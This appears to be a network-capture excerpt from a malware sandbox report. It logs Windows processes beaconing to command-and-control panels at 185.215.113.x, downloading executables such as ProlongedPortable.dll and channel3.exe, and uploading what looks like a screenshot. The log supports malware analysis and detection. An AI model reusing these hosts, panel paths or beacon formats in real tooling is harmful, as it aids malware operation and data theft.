Sep 3, 2024 17:13:51.899262905 CEST	85	OUT	GET /ProlongedPortable.dll HTTP/1.1 Host: 185.215.113.19 Connection: Keep-Alive
Sep 3, 2024 17:13:52.697071075 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:52 GMT Content-Type: application/octet-stream Content-Length: 514560 Last-Modified: Sun, 01 Sep 2024 13:24:10 GMT Connection: keep-alive ETag: "66d46afa-7da00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 4f 8e d0 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 30 00 00 d2 07 00 00 06 00 00 00 00 00 00 3e f1 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f0 07 00 4f 00 00 00 00 00 08 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELO!0> @ @@O H.textD `.rsrc@@.reloc @B HGW^YQ=(s2$(\|cFOH:<iv$:S(Ot!"Ol,^lwgdSUJJ)wIvVy^Wx'f0HgV{fUAXoOR)AT]L%cJv9}#-V%~GN'I5v;II)HqZ<+(\|M{3UatUf[
Sep 3, 2024 17:13:52.697118044 CEST	1236	IN	Data Raw: 5b 66 09 d0 dc 08 06 00 00 00 00 00 00 00 00 07 00 00 00 05 05 00 00 00 08 00 00 00 05 05 00 00 00 00 00 00 01 01 00 00 00 09 00 00 00 02 02 00 00 00 0a 00 00 37 f0 f0 37 00 00 00 00 00 a4 a4 00 00 00 01 00 00 00 81 81 00 00 00 0b 0c 0d 00 00 00 Data Ascii: [f77FF..
Sep 3, 2024 17:13:52.697130919 CEST	1236	IN	Data Raw: 01 00 00 00 00 00 00 00 00 11 01 00 00 00 15 15 00 00 00 01 00 00 00 4f 4f 00 00 00 01 00 00 00 3b 3b 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 16 16 00 00 00 01 00 00 00 ef ef 00 00 00 01 00 00 00 8a 8a Data Ascii: OO;;llaa
Sep 3, 2024 17:13:52.697148085 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 11 01 00 00 00 2c 2c 00 00 00 01 00 00 00 c5 c5 00 00 00 01 00 00 00 aa aa 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 2d 2d 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 2d 2d 00 Data Ascii: ,,----BB..////__00
Sep 3, 2024 17:13:52.697189093 CEST	1236	IN	Data Raw: 00 00 13 01 00 00 00 42 42 00 00 00 14 15 16 01 00 00 00 cb cb 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 43 43 00 00 00 01 00 00 00 9f 9f 00 00 00 01 00 00 00 fe fe 00 00 00 17 18 0e 00 00 00 04 04 00 00 Data Ascii: BBCCDDDDUUEEEEFFFF
Sep 3, 2024 17:13:52.697200060 CEST	1236	IN	Data Raw: 00 14 15 16 01 00 00 00 6d 6d 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 59 59 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 59 59 00 00 00 14 15 16 01 00 00 00 d4 d4 00 00 00 17 18 0e 00 00 00 04 04 Data Ascii: mmYYYYZZrr[[[[==\\
Sep 3, 2024 17:13:52.697211981 CEST	776	IN	Data Raw: 01 00 00 00 00 00 00 00 00 11 01 00 00 00 6f 6f 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 6f 6f 00 00 00 14 15 16 01 00 00 00 2d 2d 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 70 70 00 00 00 01 00 Data Ascii: oooo--ppooqqrrrrss
Sep 3, 2024 17:13:52.697226048 CEST	1236	IN	Data Raw: 01 00 00 00 00 00 00 00 00 11 01 00 00 00 7d 7d 00 00 00 12 00 00 00 03 03 00 00 00 13 01 00 00 00 7d 7d 00 00 00 14 15 16 01 00 00 00 10 10 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 7e 7e 00 00 00 12 00 Data Ascii: }}}}~~~~SS
Sep 3, 2024 17:13:52.697453022 CEST	1236	IN	Data Raw: 10 00 00 00 01 00 00 00 9e 9e 00 00 00 01 00 00 00 ed ed 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 11 11 00 00 00 01 00 00 00 9f 9f 00 00 00 01 00 00 00 bf bf 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 Data Ascii: KK99rr
Sep 3, 2024 17:13:52.697464943 CEST	1236	IN	Data Raw: 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 28 28 00 00 00 1b 00 00 00 06 06 00 00 00 1c 01 00 00 00 28 28 00 00 00 14 15 16 01 00 00 00 28 28 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 29 29 Data Ascii: (((((())**44ZZ++,,
Sep 3, 2024 17:13:52.703016996 CEST	1236	IN	Data Raw: 25 25 00 00 00 01 00 00 00 05 05 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 40 40 00 00 00 01 00 00 00 c2 c2 00 00 00 01 00 00 00 f5 f5 00 00 00 17 18 0e 00 00 00 04 04 00 00 00 01 00 00 00 00 00 00 00 00 Data Ascii: %%@@AAAABBBBAACC!!@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49770	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:51.958863974 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:52.766386986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:52.806564093 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:53.121913910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49771	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:52.444967985 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:53.249034882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:53.537471056 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:13:53.794401884 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49772	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:53.617830992 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:54.421897888 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:54.440587997 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:54.785053015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	49773	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:53.918540001 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:54.848088026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:54.887245893 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:13:55.155361891 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	49775	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:54.326576948 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTI2NDg2 Host: 185.215.113.19 Content-Length: 126638 Cache-Control: no-cache
Sep 3, 2024 17:13:54.326637983 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 49 32 4e 44 67 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTI2NDg2Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:13:54.326694012 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:13:54.326721907 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:13:54.326747894 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:13:54.326766014 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:13:54.326793909 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:13:54.326816082 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:13:54.326842070 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:13:54.326870918 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:13:54.326886892 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:13:56.385845900 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	49774	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:54.412369967 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:55.379797935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:55.399490118 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:13:55.789463043 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 65 37 0d 0a 20 3c 63 3e 31 30 30 30 32 38 33 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 35 31 36 65 39 34 31 64 33 33 66 61 64 61 66 64 62 66 39 37 32 35 66 63 64 39 36 66 34 65 66 65 61 64 36 34 32 37 37 32 38 34 63 37 61 63 30 33 34 31 62 61 37 34 62 36 30 66 32 63 30 34 39 32 35 66 61 61 66 37 37 66 38 64 23 31 30 30 30 32 38 34 30 30 31 2b 2b 2b 39 37 32 38 39 64 30 33 31 38 37 62 39 34 30 33 37 37 62 62 39 35 61 32 66 66 63 31 36 65 62 66 63 33 33 39 30 34 61 31 66 35 33 62 36 65 35 62 39 66 63 63 61 63 35 65 30 61 62 63 33 33 62 30 30 34 33 36 34 65 63 62 30 38 65 32 64 65 34 33 61 64 33 62 32 37 37 37 62 66 30 36 30 66 31 63 37 66 62 31 61 37 31 36 33 62 33 34 33 61 62 38 66 36 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: e7 <c>1000283001+++97289d03516e941d33fadafdbf9725fcd96f4efead64277284c7ac0341ba74b60f2c04925faaf77f8d#1000284001+++97289d03187b940377bb95a2ffc16ebfc33904a1f53b6e5b9fccac5e0abc33b004364ecb08e2de43ad3b2777bf060f1c7fb1a7163b343ab8f6#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	49776	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:55.003032923 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:55.815053940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:55.829822063 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:56.124721050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	49777	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:55.391571999 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:56.241060019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:56.269901991 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:13:56.571372986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	49778	103.130.147.211	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:55.801116943 CEST	59	OUT	GET /Files/channel3.exe HTTP/1.1 Host: 103.130.147.211
Sep 3, 2024 17:13:56.472563028 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 03 Sep 2024 09:40:49 GMT ETag: "65573c-62133da497946" Accept-Ranges: bytes Content-Length: 6641468 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 00 9f d6 66 00 14 5f 00 9b 25 00 00 e0 00 06 01 0b 01 02 23 00 d6 47 00 00 66 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 f0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 c6 00 00 06 00 00 31 99 65 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 b3 00 42 00 00 00 00 50 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b3 00 20 2c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 9a 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf_%#GfZfG@1e @BP ,HQ.textTGG`P`.dataGG@`.rdataHG@`@/4HH@0@.bssTfPL`.edataB@.L@0@.idataP0L@0.CRT4`:L@0.tlsp<L@0.reloc ,.>L@0B/14lZ@B/29tZ@B/41XLpN\@B/55Bj\@B/67TN]
